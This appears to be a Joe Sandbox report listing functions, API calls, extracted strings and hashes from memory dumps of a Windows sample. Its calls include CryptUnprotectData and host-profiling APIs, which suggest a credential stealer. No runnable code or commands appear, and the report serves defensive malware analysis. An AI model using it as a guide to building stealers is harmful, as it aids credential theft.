Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: MetricsSystem
String ID: $$W}$,W}$4W}$V}$V}
API String ID: 4116985748-3939036766
Opcode ID: e781021e72fad4a841635112d7e6fe632086fa805a2daae0e413a511b1ff44bf
Instruction ID: 2508e4028bdb72e072a411be9d14a2081823755924b4f753a5a4b1d35f5d4a7e
Opcode Fuzzy Hash: e781021e72fad4a841635112d7e6fe632086fa805a2daae0e413a511b1ff44bf
Instruction Fuzzy Hash: B9817DB451A7809FD360DF29D94878ABBF1BB85308F50992EE4888B350D7B99448CF93

Function 007A60F8 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 488
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007A642C

Strings

$&,?, xrefs: 007A62C6
i|}, xrefs: 007A64AF
?G?4, xrefs: 007A62BB
lfpu, xrefs: 007A646D
O, xrefs: 007A62D1
bdz, xrefs: 007A644E

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: O$$&,?$?G?4$bdz$i|}$lfpu
API String ID: 834300711-4164664841
Opcode ID: d5d279a111d7c8fb65549a66ab91e518a78d97b98efc22a1fd579b6906b9885f
Instruction ID: 49931769f70ae87db7118c5740cae131ae9b045820e2ec5423757d3f299abd7b
Opcode Fuzzy Hash: d5d279a111d7c8fb65549a66ab91e518a78d97b98efc22a1fd579b6906b9885f
Instruction Fuzzy Hash: BDF106B2908391CFD724CF28D84566BB7E2BFD5314F198A2DE4D987252E738D905CB82

Function 0079ABD0 Relevance: 11.7, Strings: 9, Instructions: 499
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Q%H', xrefs: 0079ACAD
,M&O, xrefs: 0079ADA5
;I<K, xrefs: 0079AD9B
X)J+, xrefs: 0079ACB4
\=p?, xrefs: 0079ACDD
5A1C, xrefs: 0079AD87
3E(G, xrefs: 0079AD91
RK, xrefs: 0079AE77
D-y/, xrefs: 0079ACBB

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: ,M&O$3E(G$5A1C$;I<K$D-y/$Q%H'$RK$X)J+$\=p?
API String ID: 0-2073365994
Opcode ID: cd2afae475f369a63d41a13adc4e30cb21383c53b33246469a0a9b6073eca688
Instruction ID: fe01b6255c6516e82ca55f8e9c3aa6fd214c71c25e5e583ea97499b8c39ac8ed
Opcode Fuzzy Hash: cd2afae475f369a63d41a13adc4e30cb21383c53b33246469a0a9b6073eca688
Instruction Fuzzy Hash: 63126AB1501B01CFD3348F25D885B97BBF1FB89314F148A1DD5AA8BBA1DB78A406CB94

Function 007B3A00 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 542
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+,, xrefs: 007B3F23
z{, xrefs: 007B3A45
JJ, xrefs: 007B3D69
'\, xrefs: 007B3D79
RT, xrefs: 007B401E

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: '\$+,$JJ$z{$RT
API String ID: 0-1188437889
Opcode ID: e73633a68980eadc60a28eea3fd27c831502852cc01f0044d2998cb81c6a0c79
Instruction ID: 90aebc379ba4ff79c736fff37e1b149737e20f8044b0eda166240eb2110900a3
Opcode Fuzzy Hash: e73633a68980eadc60a28eea3fd27c831502852cc01f0044d2998cb81c6a0c79
Instruction Fuzzy Hash: 8F02FDB1609340CFD704DF68D8917ABBBE1EF81300F05896DE5968B395E7B89906CB86

Function 007BDAAF Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 481
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 007BDBEF
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 007BDCAD

Strings

K, xrefs: 007BDDF2
]^U\, xrefs: 007BDBFC
%1, xrefs: 007BDE00
6, xrefs: 007BE0A9

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: ComputerName
String ID: %1$6$K$]^U\
API String ID: 3545744682-2151241452
Opcode ID: 288e3d6eabafb52fca28987dc00b15dfe78d3e24a6e7920f96a864b6493bf25a
Instruction ID: 1dee55e9d7c7b71f90502bfeb7e5ccb3e8d2ddebb6013b8a8a6eb6596fe69dc2
Opcode Fuzzy Hash: 288e3d6eabafb52fca28987dc00b15dfe78d3e24a6e7920f96a864b6493bf25a
Instruction Fuzzy Hash: C9D1D06121C3818ED7358F3884517FBBBD1ABA7304F18896DD4C98B383E779894AD752

Function 007BDAB4 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 007BDBEF
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 007BDCAD

Strings

K, xrefs: 007BDDF2
]^U\, xrefs: 007BDBFC
%1, xrefs: 007BDE00
6, xrefs: 007BE0A9

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: ComputerName
String ID: %1$6$K$]^U\
API String ID: 3545744682-2151241452
Opcode ID: 9165fbaa6f7758227bd41232c22d84f4ed4d84212f91e888fe0edbf19418346c
Instruction ID: 275bbaa4b4c8d6c9fdfe27cc99bd34e9abed2ea4ad22077b421daf7fc01484b5
Opcode Fuzzy Hash: 9165fbaa6f7758227bd41232c22d84f4ed4d84212f91e888fe0edbf19418346c
Instruction Fuzzy Hash: 5CD1E26011C3D08AD7358F3984617FBBBE19FA3304F1889ADD4C99B283EB794905CB62

Function 0079DF82 Relevance: 9.6, APIs: 2, Strings: 4, Instructions: 636
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0079DF8A
CoUninitialize.COMBASE ref: 0079E32A

Strings

V:V*, xrefs: 0079E348
&GQw, xrefs: 0079E6C8
V:V*, xrefs: 0079DFA8
us, xrefs: 0079E5C7

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: Uninitialize
String ID: &GQw$V:V*$V:V*$us
API String ID: 3861434553-2648263849
Opcode ID: 4757a84ebf52e52726ae8578b0fd81c6c1d052ef6353eea143f1ca515675db78
Instruction ID: bf5f44515a8f39000948b9719fb5c1c0208ce0cac4bb462f8b443d5946bf2144
Opcode Fuzzy Hash: 4757a84ebf52e52726ae8578b0fd81c6c1d052ef6353eea143f1ca515675db78
Instruction Fuzzy Hash: 31220375245781CFD729CF29D490A22BFE2FFA6310B29869DC0D64F762D73A9806CB11

Function 007ACC00 Relevance: 9.4, Strings: 7, Instructions: 625
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

rs, xrefs: 007ACEAC
twia, xrefs: 007ACC03
f, xrefs: 007ACF27
d}, xrefs: 007ACF17
p c", xrefs: 007AD242
7(, xrefs: 007ACDE2
;<, xrefs: 007ACCDF

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: 7($;<$d}$f$p c"$rs$twia
API String ID: 0-3111116717
Opcode ID: ea49c4f26797140a9245fe4e0a12286a238b98242efa492262ddb737fb6ad54e
Instruction ID: 142664db3ddcb8f2ed3a8075043bfdeb7db74f9c5ac3bfef7f05769ec9f9c300
Opcode Fuzzy Hash: ea49c4f26797140a9245fe4e0a12286a238b98242efa492262ddb737fb6ad54e
Instruction Fuzzy Hash: 0612C07260C3009BC718DF69D89166BB7E2EFD6314F08992CF4C68B251E739D909CB96

Function 0079C9FC Relevance: 8.1, Strings: 6, Instructions: 615
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

sK@C, xrefs: 0079CA0A
MO, xrefs: 0079CF42
D, xrefs: 0079CFD5
Q?S, xrefs: 0079CF49
sK@C, xrefs: 0079CD7C
&]>_, xrefs: 0079CF5E

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: &]>_$D$sK@C$sK@C$MO$Q?S
API String ID: 0-550075371
Opcode ID: baf6ccd1dc5d21ea5d017a3664d8105dca72a131acc5238bcf5ee56e74814815
Instruction ID: 9708236530e62413e1566630fb90672a7cb52ed94aa8b486d7ed332a621989f5
Opcode Fuzzy Hash: baf6ccd1dc5d21ea5d017a3664d8105dca72a131acc5238bcf5ee56e74814815
Instruction Fuzzy Hash: 4512F3B5240B418FC725CF2AD490A12BBE2FF96310B5986ADC4D68F766D738E806CF50

Function 00798670 Relevance: 7.7, APIs: 5, Instructions: 158
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00798694
GetCurrentThreadId.KERNEL32 ref: 0079869E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0079874F
GetForegroundWindow.USER32 ref: 0079879F
ExitProcess.KERNEL32 ref: 0079883E

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 7d5f447fe53ef5dba06349d5100e1e2167f10e4ffbfebb194adee5ab50ab781a
Instruction ID: e040c488946738f54d16617752d0b0c601a79a66cc57b7a7bc9957d89db8d703
Opcode Fuzzy Hash: 7d5f447fe53ef5dba06349d5100e1e2167f10e4ffbfebb194adee5ab50ab781a
Instruction Fuzzy Hash: CD414737B443185BD748AEF9DC9536AB2C39BC4721F0A813D6A89D7385EDB8DC0582D1

Function 007A6ED1 Relevance: 6.6, Strings: 5, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

f#A%, xrefs: 007A6FE1, 007A7028
|p, xrefs: 007A6F01
@'I), xrefs: 007A6F6C
twia, xrefs: 007A6F24
ech`, xrefs: 007A6EEB

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: @'I)$ech`$f#A%$twia$|p
API String ID: 0-4077543266
Opcode ID: 067c41fd57b0f6022d53f6380a21a81a386fe7fa9d89f66c1eabd18a74ba51ff
Instruction ID: 1c3b3b7f25ebec5dfab34473e8c1aecb08e568c74e12848fdfc40865dafa7258
Opcode Fuzzy Hash: 067c41fd57b0f6022d53f6380a21a81a386fe7fa9d89f66c1eabd18a74ba51ff
Instruction Fuzzy Hash: 58C1D2B2908351DBD7258F24D8826ABB7F1FFD6320F148A2DE89947351E7389901DB92

Function 007BE145 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 395COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 007BE2AF

Strings

j, xrefs: 007BE2D2
8<=, xrefs: 007BE431

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 8<=$j
API String ID: 3960555810-2099924815
Opcode ID: c5c0845fbaceb9bda5262d9eb57435e2d457a52d21bcb421976267f7ca9225bf
Instruction ID: 6c655a04283f6ec98b4ca4b90ece5ad08820c8d8c43d82147bf0ae288fbc3271
Opcode Fuzzy Hash: c5c0845fbaceb9bda5262d9eb57435e2d457a52d21bcb421976267f7ca9225bf
Instruction Fuzzy Hash: B7B1D27150C3D18AD729CF3984507EBBBE1AF97304F1889ADD4CA9B382D77949098B92

Function 007BC981 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 349COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 007BE2AF

Strings

j, xrefs: 007BE2D2
8<=, xrefs: 007BE431

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 8<=$j
API String ID: 3960555810-2099924815
Opcode ID: cd8a59575328fac9ffeee253f33d981b066efedc0507f4a9ef6c9d1e668883de
Instruction ID: 9a8d8d20b7786f1c1456cfefd6130fd2a5e4a78d575e07b24555abf2cf2a90f9
Opcode Fuzzy Hash: cd8a59575328fac9ffeee253f33d981b066efedc0507f4a9ef6c9d1e668883de
Instruction Fuzzy Hash: 90A1A07150C3918ED729CF3884507EBBBE1AF97304F1889ADD4CA9B382D7794949CB92

Function 0079A710 Relevance: 5.4, Strings: 4, Instructions: 391COMMON

Download Yara Rule

Strings

_\t<, xrefs: 0079A775, 0079A929
fmno, xrefs: 0079A864
),ji, xrefs: 0079AA4E
NJB@, xrefs: 0079A722

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: ),ji$NJB@$_\t<$fmno
API String ID: 0-232877553
Opcode ID: 84d3e8ba597e995150ffc41407c30d4305bad8f40940a1cfcb5a5b62bac0616f
Instruction ID: 65d61b8031ac34fb35e8b84fcbde3d14e93e4b9a164633299108e818a833f431
Opcode Fuzzy Hash: 84d3e8ba597e995150ffc41407c30d4305bad8f40940a1cfcb5a5b62bac0616f
Instruction Fuzzy Hash: A8C114B260D3409BC724DF69A45126FBBE3EFC2310F18892DE4D58B341D679890ACB97

Function 007C67D0 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

l, xrefs: 007C67E9
k, xrefs: 007C67E4
b, xrefs: 007C67DF
m, xrefs: 007C67EE

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: b$k$l$m
API String ID: 0-1609332128
Opcode ID: 5a972d1227d1a8b0910c853fbb0f00890618417ccf9241051eb06068ef52e1be
Instruction ID: 353de6a32578c9a420e1258ab47d87033c8923328879ed3cd5b9979d95a984b2
Opcode Fuzzy Hash: 5a972d1227d1a8b0910c853fbb0f00890618417ccf9241051eb06068ef52e1be
Instruction Fuzzy Hash: E1A1243610C3808FD3208E2888D5B6FBBD2ABD5324F298A2EE5D5973D2D27DD845C706

Function 007AFA00 Relevance: 4.4, Strings: 3, Instructions: 682COMMON

Download Yara Rule

Strings

UNC, xrefs: 007AFAA2
UNC, xrefs: 007AFA9B
UNC, xrefs: 007AFA83

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: UNC$UNC$UNC
API String ID: 0-536518775
Opcode ID: 1a31d42671b715a863adc4a2b93a3c4f12b47f1947e3bf773acb71a0eda0d21c
Instruction ID: e14eccc3579f9a7d0204edafcba62c38d87ec04d95f29a93b92d6e4da1f51f92
Opcode Fuzzy Hash: 1a31d42671b715a863adc4a2b93a3c4f12b47f1947e3bf773acb71a0eda0d21c
Instruction Fuzzy Hash: 36628EB0609B808ED325CB3C8855797BFE5AB5A324F044A5EE0FE873D2C7796101CB66

Function 0079D338 Relevance: 4.0, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

F771030F9526602D0EE189CCD4D6D92A, xrefs: 0079D4A2
|}~, xrefs: 0079D4E5
Fxz, xrefs: 0079D4DE

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: F771030F9526602D0EE189CCD4D6D92A$Fxz$|}~
API String ID: 0-1663953626
Opcode ID: 6fc38477bca4178b2224f942681f3eca8efc7eb0b16aea1a0fcd35021a78c4c7
Instruction ID: 27d6f527d8596098289578730ef63c44d9de21346b2352fd411b3c73f3171b05
Opcode Fuzzy Hash: 6fc38477bca4178b2224f942681f3eca8efc7eb0b16aea1a0fcd35021a78c4c7
Instruction Fuzzy Hash: DB612576710B428FC724CF39D891B66B7E3EF95304F19C96DD18A8B756EA38A801CB14

Function 007CEC00 Relevance: 2.9, Strings: 2, Instructions: 385COMMON

Download Yara Rule

Strings

WVW(, xrefs: 007CEE54
/./ , xrefs: 007CED0B, 007CEDC7

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitializeThunk
String ID: /./ $WVW(
API String ID: 2994545307-2734811727
Opcode ID: 9eb8b1b03867623ffca06a9143cf30ab4e86dfca55cb63ec7eae47214fd4ad89
Instruction ID: 534af80eb632711c71f5279758d1b1e0f7aad720ba29ca00256a324c79e7ae65
Opcode Fuzzy Hash: 9eb8b1b03867623ffca06a9143cf30ab4e86dfca55cb63ec7eae47214fd4ad89
Instruction Fuzzy Hash: EDB1F376B483118BC714CE29D881AABB7E2EBD5314F08CA3DE595C7395D638EC46C782

Function 007CB5B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(007CD73E,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 007CB5DE

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 007C9A00 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 007C9A10

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 43601ff53c886443771a100a64f2e7f00bc90e8bc1fc3298515c6f44d10e5c47
Instruction ID: e61d0bd5f227b7b2fd5468db9228ae08bafd2386b63e9676aeb7a18f04feb13e
Opcode Fuzzy Hash: 43601ff53c886443771a100a64f2e7f00bc90e8bc1fc3298515c6f44d10e5c47
Instruction Fuzzy Hash: DFC01230956160ABC2146F04DD09FAABB78AF0B301F00A008A00C7B1B1C778A801CA9C

Function 007CD570 Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

@, xrefs: 007CD63B

